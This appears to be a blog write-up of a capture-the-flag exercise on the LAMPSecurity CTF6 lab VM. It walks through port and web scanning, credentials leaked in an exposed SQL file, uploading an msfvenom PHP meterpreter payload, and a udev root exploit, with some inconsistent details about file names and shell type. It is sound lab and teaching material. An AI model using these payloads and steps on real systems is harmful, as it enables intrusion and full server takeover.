Pen Testing – LAMPSecurity (CTF6)

Introduction

I recently learned about VulnHub, a site where you can download and attack some demo machines that others have shared. It is very useful if you are looking to learn about security or advance your existing skills. In this post I was targeting the LAMPSecurity: CTF6 machine. Setup is pretty simple, I downloaded the VM, converted it into qcow2 format and then fired it up with kvm.

1

Recon/Scanning

To start off I wanted to see what ports and services are running so I decided to run a scan to see if I could get more information.

The first issue is that the machine uses a DHCP so I need to determine its ip address.

# nmap -sP 192.168.1.0/24

Starting Nmap 7.12 ( https://nmap.org ) at 2016-04-22 21:03 EDT
Nmap scan report for 192.168.1.211
Host is up (0.00011s latency).
MAC Address: 52:54:00:2E:EF:25 (QEMU virtual NIC)
Nmap scan report for 192.168.1.1
Host is up.
Nmap done: 256 IP addresses (2 hosts up) scanned in 6.38 seconds

Now I know the IP of the gateway is 192.168.1.1 so the IP address of the target machine is 192.168.1.211. Now that I know that I can perform a scan on the ports to see what is open.

# nmap -sS -sV 192.168.1.211
Nmap scan report for 192.168.1.211
Host is up (0.00013s latency).
Not shown: 991 closed ports
PORT     STATE SERVICE  VERSION
22/tcp   open  ssh      OpenSSH 4.3 (protocol 2.0)
80/tcp   open  http     Apache httpd 2.2.3 ((CentOS))
110/tcp  open  pop3     Dovecot pop3d
111/tcp  open  rpcbind  2 (RPC #100000)
143/tcp  open  imap     Dovecot imapd
443/tcp  open  ssl/http Apache httpd 2.2.3 ((CentOS))
993/tcp  open  ssl/imap Dovecot imapd
995/tcp  open  ssl/pop3 Dovecot pop3d
3306/tcp open  mysql    MySQL 5.0.45
MAC Address: 52:54:00:2E:EF:25 (QEMU virtual NIC)

The website seems to have Apache running so I decided to try scanning it with nikto to see if there are any interesting pages avaliable.

# nikto -h http://192.168.1.211/
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.1.211
+ Target Hostname:    192.168.1.211
+ Target Port:        80
+ Start Time:         2016-04-22 21:25:05 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.2.3 (CentOS)
+ Cookie PHPSESSID created without the httponly flag
+ Retrieved x-powered-by header: PHP/5.2.6
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Apache/2.2.3 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-12184: /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-3268: /files/: Directory indexing found.
+ OSVDB-3092: /files/: This might be interesting...
+ OSVDB-3268: /lib/: Directory indexing found.
+ OSVDB-3092: /lib/: This might be interesting...
+ Cookie roundcube_sessid created without the httponly flag
+ OSVDB-3092: /mail/: This might be interesting...
+ OSVDB-3092: /phpmyadmin/changelog.php: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ Server leaks inodes via ETags, header found with file /phpmyadmin/ChangeLog, inode: 97164, size: 35791, mtime: Wed Oct 19 17:47:44 2095
+ OSVDB-3092: /phpmyadmin/ChangeLog: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ OSVDB-3268: /sql/: Directory indexing found.
+ OSVDB-3092: /manual/: Web server manual found.
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3268: /manual/images/: Directory indexing found.
+ OSVDB-3268: /docs/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ /phpmyadmin/: phpMyAdmin directory found
+ OSVDB-3092: /phpmyadmin/Documentation.html: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ 8496 requests: 0 error(s) and 29 item(s) reported on remote host
+ End Time:           2016-04-22 21:25:14 (GMT-4) (9 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

There seems to be an interesting directory, /sql/ so I tried visiting it and lo and behold there is a file db.sql which I was able to open it and see some interesting data.

CREATE database IF NOT EXISTS cms;

use mysql;

GRANT ALL PRIVILEGES ON cms.* to 'sql_account'@'localhost' IDENTIFIED BY 'sql_password';

use cms;

DROP TABLE IF EXISTS user;
DROP TABLE IF EXISTS event;
DROP TABLE IF EXISTS log;

CREATE TABLE IF NOT EXISTS user (
user_id int not null auto_increment primary key,
user_username varchar(50) not null,
user_password varchar(32) not null
);

CREATE TABLE IF NOT EXISTS event (
event_id int not null auto_increment primary key,
event_title varchar(255) not null,
event_body text,
event_file varchar(255) default null,
user_id int not null,
event_hits int default 0
);

CREATE TABLE IF NOT EXISTS log (
log_id int not null auto_increment primary key,
log_ip varchar(20),
log_referer varchar(255),
log_useragent varchar(255)
);

DELETE FROM user;
DELETE FROM event;
DELETE FROM log;

INSERT INTO user SET user_id = 1, user_username='admin', user_password=md5('adminpass');

...

Exploitation

The most interesting part is that there is a password for user admin in plain text. So naturally I tried to log in to the web interface and the creds worked!

2

Now I clicked the Add Event tab and it seems to let me upload files so this is possibly a situation where I can upload a reverse shell. First however I wanted to make sure there is some way for me to access the files after upload. Looking back at the nikto scan, there was a directory for /files/ and visiting it in the browser shows that this is where the system stores its files.

With that known I fired up a Kali VM and generated a reverse shell script.

root@kali:~# msfvenom -p php/meterpreter/bind_tcp R > out.php
No platform was selected, choosing Msf::Module::Platform::PHP from the payload
No Arch selected, selecting Arch: php from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 1188 bytes

Now I just uploaded the script to the site using the form and confirmed it shows up in the files directory.

3

All that was left now was to start up the listener on the Metasploit VM and wait for a connection. As soon as I clicked the reverse-shell.php file, I saw a meterpreter shell open on the Metasploit console! Success!

root@kali:~# msfconsole

msf => use exploit/multi/handler
msf exploit(handler) => set payload php/meterpreter/bind_tcp
payload => php/meterpreter/bind_tcp
msf exploit(handler) => set RHOST 192.168.1.211
RHOST => 192.168.1.211
msf exploit(handler) => exploit

[*] Started bind handler
[*] Starting the payload handler...
[*] Sending stage (33068 bytes) to 192.168.1.211
[*] Meterpreter session 1 opened (192.168.1.131:41387 -> 192.168.1.211:4444) at 2016-04-22 03:29:08 -0400

meterpreter > getuid
Server username: apache (48)

Excellent, now I needed some local vulnerability that I could exploit to take over the system. After some research I found a udev exploit that this system was apparently vulnerable to (https://www.exploit-db.com/exploits/8478/).

I created a file on the system and set the execute bit on, then ran it..

./a.sh 422
/usr/bin/ld: cannot open output file /tmp/udev: Permission denied
collect2: ld returned 1 exit status
suid.c: In function 'main':
suid.c:3: warning: incompatible implicit declaration of built-in function 'execl'
/usr/bin/ld: cannot open output file /tmp/suid: Permission denied
collect2: ld returned 1 exit status

# id
uid=0(root) gid=0(root) groups=48(apache)
# touch pwn
# ls -l
total 40
-rw------- 1 root root  1045 Jun  2  2009 anaconda-ks.cfg
-rw-r--r-- 1 root root 17219 Jun  2  2009 install.log
-rw-r--r-- 1 root root  3419 Jun  2  2009 install.log.syslog
-rw-r--r-- 1 root root     0 Apr 23 19:08 pwn

So there we go, the udev exploit was enough to compromise this server!

If you found this post interesting, stay tuned I plan on doing some more in the future.

Advertisements
This entry was posted in Bash, Hardening, Linux, Security and tagged , , . Bookmark the permalink.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s